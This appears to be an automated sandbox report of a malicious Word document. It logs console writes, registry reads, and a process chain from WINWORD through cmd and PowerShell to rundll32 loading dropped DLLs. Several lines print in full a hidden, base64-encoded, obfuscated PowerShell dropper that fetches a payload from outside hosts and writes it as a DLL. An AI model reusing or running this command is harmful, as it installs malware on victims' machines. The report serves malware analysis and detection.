Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v....X.......0................Iq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....'..................j....0Lq.............................}..v.... .......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....'..................j....................................}..v....X.......0................Iq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....3..................j....0Lq.............................}..v.... .......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....3..................j....................................}..v....X.......0................Iq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....?..................j....0Lq.............................}..v.... .......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....?..................j....................................}..v....X.......0................Iq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....K..................j....0Lq.............................}..v.... $......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....K..................j.....$..............................}..v....X%......0................Iq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....W..................j....0Lq.............................}..v.... ,......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....W..................j.....,..............................}..v....X-......0................Iq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....c..................j....0Lq.............................}..v.... 4......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....c..................j.....4..............................}..v....X5......0................Iq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....o..................j....0Lq.............................}..v.... <......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....o..................j.....<..............................}..v....X=......0................Iq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....{..................j....0Lq.............................}..v.... D......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....{..................j.....D..............................}..v....XE......0................Iq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....0Lq.............................}..v.... L......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....L..............................}..v....XM......0................Iq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....0Lq.............................}..v.... T......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....T..............................}..v....XU......0................Iq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....0Lq.............................}..v.... \......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....\..............................}..v....X]......0................Iq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............h.{.}.}.$.J.8.2.E.=.(.'.W.'.+.(.'.2.8.'.+.'.L.'.).)......a......0................Hq.....4....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....@b..............................}..v.....b......0................Iq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....0Lq.............................}..v....hi......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.... j..............................}..v.....j......0................Iq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....0Lq.............................}..v.....o......0.......................r....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....p..............................}..v....(q......0................Iq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............ ..........j....0Lq.............................}..v.....t......0................Hq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....pu..............................}..v.....u......0................Iq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................e!.j....E...............................}..v............0...............H.q............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................e!.j....E...............................}..v............0...............H.q............................. Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\msg.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcA
Source: unknown Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArAC
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eahqlsuythns\jqbptpobcyu.bhl',TagYErhYzyY
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eahqlsuythns\jqbptpobcyu.bhl',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xhprrouvvr\jernautsj.lga',fTCwfSeUSxEuwMN
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xhprrouvvr\jernautsj.lga',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lajmixobikmt\gjxhkbksotj.zja',ZPegu
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lajmixobikmt\gjxhkbksotj.zja',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Txroij\ohrhi.kon',FegmxWWxi
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Txroij\ohrhi.kon',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Whtybzptnxj\kaptmaxkac.ztu',jkFqU
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Whtybzptnxj\kaptmaxkac.ztu',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dzirlcatgln\dntukqrwhf.kiu',JykcjQ
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dzirlcatgln\dntukqrwhf.kiu',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mxtcfbxykefck\ibcdoyenctts.gsv',pUHKMD
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mxtcfbxykefck\ibcdoyenctts.gsv',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ynnlsbotf\dxdmxwxi.pod',nZgZ
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ynnlsbotf\dxdmxwxi.pod',#1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArAC Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eahqlsuythns\jqbptpobcyu.bhl',TagYErhYzyY Jump to behavior
